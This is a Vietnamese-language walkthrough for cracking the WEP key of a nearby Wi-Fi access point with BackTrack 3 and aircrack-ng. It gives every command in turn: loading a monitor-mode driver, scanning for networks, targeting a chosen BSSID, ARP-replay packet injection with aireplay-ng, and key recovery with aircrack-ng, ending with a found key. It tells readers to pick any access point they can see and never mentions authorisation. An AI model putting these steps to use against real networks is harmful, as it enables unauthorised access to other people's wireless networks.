Yêu cầu:
- Card wireless là card intel 3954/abg
- hệ điều hành linux Backtrack V3 ( Chạy trực tiếp trên CD hoặc USB)
- Một access point phát wifi có đặt password mã hóa dạng WEP

Download hệ điều hành linux Backtrack3 về ghi ra đĩa CD hoặc chép vào USB

Sau khi boot vào hệ điều hành thì các bạn mở của sổ dòng lệnh lên
Bước 1:
Kích hoạt card wireless lên đã bằng dòng lệnh iwconfig
--trước khi load driver ipwraw thì phải unload driver có sẵn đi:
modprobe -r iwl3945
--Sau đó load ipwraw lên
modprobe ipwraw
---khi bạn load thành công ipwraw rồi thì card wifi luôn ở chế độ monitor sẵn sàng để dò wep

--Kích hoạt lại card wireless
iwconfig

---Xem hình


Bước 2: Rà xem có AP nào xung quanh không

airodump-ng --ivs --write kiemtra wifi0




---bạn sẽ nhìn thấy các địa chỉ MAC,kênh vô tuyến (channel),kiểu mã hóa,tên mạng(SSID) của các
AP đang phát sóng trong khu vực, hãy chọn lấy 1 cái.
---giả sử ta chọn 1 cái AP có thông số :
BSSID: 00:1B:11:BF:C8:AF
MAC: 00:1B:77:2F:1B:3D
Channel: 6
Kiểu mã hóa: dĩ nhiên là phải chọn thằng mã hóa WEP
ESSID: Mr_Ch
Bước 3: xác định mục tiêu

airodump-ng --ivs --write mr_ch --channel 6 -b 00:1B:11:BF:C8:AF wifi0


Bước 4: Tăng cường việc bắt gói, cái này cũng khá quan trọng vì nếu tin hiệu yếu mà bạn không tăng cường
thì bạn phải mất thời gian khá lâu



aireplay-ng --arpreplay -b 00:1B:11:BF:C8:AF -h 00:1B:77:2F:1B:3D wifi0


Ở hình bên dưới ở cột Data cho thấy lượng gói IVs là 10107, nhưng khi crack WEP thì vẫn không ra, ngồi chờ thêm tí nữa



Sau khi đã bắt được khoảng 30.000 gói IV mình crack WEP key

aircrack-ng -b 00:1B:11:BF:C8:AF /root/mr_ch-01.ivs




Đợi một lúc bạn sẽ thấy key found [09:03:70:31:92] đây chính là password